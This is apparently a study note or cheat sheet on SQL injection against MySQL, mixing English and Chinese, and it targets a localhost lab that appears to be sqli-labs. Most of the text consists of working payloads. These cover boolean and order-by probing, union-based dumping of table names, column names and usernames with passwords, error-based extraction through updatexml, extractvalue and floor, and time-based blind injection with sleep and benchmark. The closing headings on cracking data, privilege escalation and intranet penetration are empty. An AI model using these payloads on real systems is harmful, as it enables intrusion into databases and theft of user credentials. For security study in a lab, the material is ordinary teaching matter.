SQL injection --SQL injection process

1, it is determined whether an injection

It determines whether there is injection	and 1=1 and 1=2 and 3-2=1 and 3-1=1 '') ')') ')) "))` Abnormality detected page ‘ and 1=1 -- - ‘ and  1=2 -- - ‘  and 3-2=1 -- - ‘ and   3-1=1 -- -
order by	Determine the number of fields sql.php?id=1 order by 1,2,3,4 When the field is not greater than the number of order by the number of queries field, the statement will be executed normally, when the number of fields is greater than the number of queries field, the statement will complain.
Determining the position of the output parameters	union select 1,2,3 2 and 3 can be seen in the output page, you can determine these two parameters will be output.
View basic information database	union select  1,version(),database()

2, union injection

1, display position
2, to see which database tables	union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security'
3, see the corresponding table which columns	union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users'
4, view account password information	union select 1,group_concat(username),group_concat(password) from users
5, source code analysis

3, based on the error display implantation

http://localhost/sql-1.php?id=-1  and updatexml(1,concat(0x7e,database()),1)

There was an error must be returned

http://localhost/sql-1.php?id=-1  and updatexml(1,concat(0x7e,(select  substring(group_concat(schema_name),21,20)from information_schema.schemata) ),1)

http://localhost/sql-1.php?id=-1  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') ),1)

http://localhost/sql-1.php?id=-1  and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'  ) ),1)

http://localhost/sql-1.php?id=-1  and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from security.users ) ),1)

4、盲注之报错注入

1、只需要能够执行sql语句。
2、extractvalue(arg1,arg2) :从目标XML中返回包含所查询值的字符串,arg1为是String格式，为XML文档对象的名称。arg2为Xpath格式的字符串。	语句：select extractvalue(1,concat(0x7e,(select user()),0x7e)) 返回结果：XPATH syntax error: '~root@localhost~
3、updatexml(arg1,arg2,arg3):改变文档中符合条件的节点的值，arg1位xml文档对象的名称,arg2为xpath格式的字符串,arg3，String格式，替换查找到的符合条件的数据。	语句:select updatexml(1,concat(0x7e,(select user()),0x7e),1) 返回结果：XPATH syntax error: '~root@localhost~
4、floor(arg1)：函数只返回arg1整数部分，小数部分舍弃。	语句：select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3 返回结果：Duplicate entry 'root@localhost1' for key 'group_key’
5、Extractvalue() updatexml()	有32位长度限制 报错函数有mysql版本限制
6、查看数据库名字	1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
7、查看数据库有哪些表	1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#

5、基于查询时间的注入

benchmark()	benchmark(arg1,arg2) arg1为操作的函数，arg2为操作次数 语句:select if(1=1, benchmark(5000000,md5('abc')), 'goodbye') 返回结果：页面延迟2秒显示
sleep	sleep(arg1) arg1中断的时间单位为秒。 语句：select if(1=1, sleep(3), 'goodbye') 返回结果：页面延迟3秒显示
数据库名的长度	and if((length(database()))>5),sleep(5),0) and (length(database()))>5 and (length(database()))=4
改变n的值依次获取数据库名的字符	and (ascii(substr(database(),n,1)))>100
获取数据库表名（同理先获取长度）	and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100
获取列名	and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100
获取数据	and (ascii(substr(( select password from users limit 0,1),1,1)))=68

6、获取数据库信息

获取数据库基本信息

获取列名

获取数据库名

获取表名

获取用户数据

7、破解数据

8、提升权限

9、内网渗透